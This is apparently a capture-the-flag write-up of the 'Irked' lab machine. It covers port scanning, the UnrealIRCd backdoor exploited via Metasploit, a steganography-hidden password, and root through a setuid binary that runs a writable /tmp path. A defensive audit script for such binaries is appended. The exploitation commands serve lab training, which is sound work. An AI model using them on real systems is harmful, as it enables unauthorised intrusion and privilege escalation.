As usual, we will start off with an nmap scan.
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
34271/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Looks like IRC is running on a couple of ports, along with httpd. Taking into account the name of the box, it's probably safe to assume IRC is the way in, but first let's look at the website.
Hmm, let's pull down that jpg for later.
A quick Google search for UnrealIRCd turns up a backdoor in the 3.2.8.1 release (CVE-2010-2075), and there is a Metasploit module for it. Let's set it up against port 8067 and see what we get.
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  10.10.10.117     yes       The target address
   RPORT  8067             yes       The target port (TCP)
It works, and we get dropped into a shell as a user named ircd.
whoami
ircd
Looking through the home directories, we find a couple of interesting files in another user's Documents directory.
/home/djmardov/Documents
ls -lah
total 16K
drwxr-xr-x  2 djmardov djmardov 4.0K May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4.0K Nov 23 10:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
Catting out the .backup file gives us a password and a bit of a hint.
Super elite steg backup pw
UP********************ss
Now we have a password and a hint pointing to stego. Let's look at the jpg we downloaded earlier with steghide.
steghide extract -sf irked.jpg
This gives us another file, pass.txt.
Ka************HG
Using that password to SSH in as djmardov, the user who owns the file, we get a clean shell and access to user.txt.
cat user.txt
4a****************************8e
After a bit of enumeration of setuid binaries, we find an executable with an interesting name.
find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
Running it gives us one more hint: it looks like it is calling another file, via sh, that does not exist.
/usr/bin/viewuser
(unknown) :0           2018-11-22 12:34 (:0)
sh: 1: /tmp/listusers: not found
This application is being devleoped to set and test user permissions
It is still being actively developed
Creating an executable file at that location that runs /bin/bash, then running viewuser again, gives us a root shell and the root flag.
echo "/bin/bash" > /tmp/listusers
chmod +x /tmp/listusers
/usr/bin/viewuser
(unknown) :0           2018-11-22 12:34 (:0)
whoami
root
cat /root/root.txt
8d****************************f3
NOTE: We do not actually need the djmardov user for this. The privesc can be done directly from the ircd user, after which the user flag can be read as root. This is, however, probably not the intended path.
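The root cause of the privesc above is a setuid-root program that executes a path under /tmp, a directory every local user can write to. As an added audit helper that is not part of the original writeup, the POSIX sh script below lists setuid/setgid files under a directory and reports any embedded absolute path whose nearest existing parent directory is world-writable; it assumes GNU grep (for -a/-o) and that `ls -ldL` shows the "other" write bit in column 9 of the mode string.

```shell
#!/bin/sh
# Added audit helper, not from the writeup. Assumes GNU grep (-a/-o) and a
# POSIX ls whose mode string puts the "other" write bit in column 9.

# world_writable DIR: true when "other" can write to DIR (e.g. drwxrwxrwt for
# /tmp). -L follows symlinks so a merged-/usr /bin -> usr/bin link is judged
# by its target, not by the lrwxrwxrwx mode of the link itself.
world_writable() {
    case "$(ls -ldL "$1" 2>/dev/null)" in
        ????????w*) return 0 ;;
        *)          return 1 ;;
    esac
}

# writable_refs FILE: print each distinct absolute path embedded in FILE whose
# nearest existing parent directory is world-writable, i.e. a path that any
# local user could create or replace before the privileged program runs it.
writable_refs() {
    grep -ao '/[A-Za-z0-9_.-][A-Za-z0-9_./-]*' "$1" 2>/dev/null | sort -u |
    while read -r p; do
        d=$(dirname "$p")
        # climb until we reach a directory that actually exists
        while [ ! -d "$d" ] && [ "$d" != / ]; do
            d=$(dirname "$d")
        done
        if world_writable "$d"; then
            echo "$p"
        fi
    done
}

# audit_setuid_refs ROOT: for every setuid or setgid file under ROOT, print
# "FILE PATH" for each hijackable reference. Run it against / on a real host;
# a binary like /usr/bin/viewuser should be reported with /tmp/listusers.
audit_setuid_refs() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
    while read -r f; do
        writable_refs "$f" | while read -r p; do
            echo "$f $p"
        done
    done
}
```

String matching finds only literal paths, so a program that builds the path at runtime (or relies on PATH lookup) needs a tracing tool such as strace to catch; treat the report as a triage list, not a proof of safety.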
This was a pretty direct machine; however, the use of stego to hide a password is a little unrealistic. A few of the newer machines being added to the active lineup, DevOops for example, have been more real-world, which makes them a bit more fun.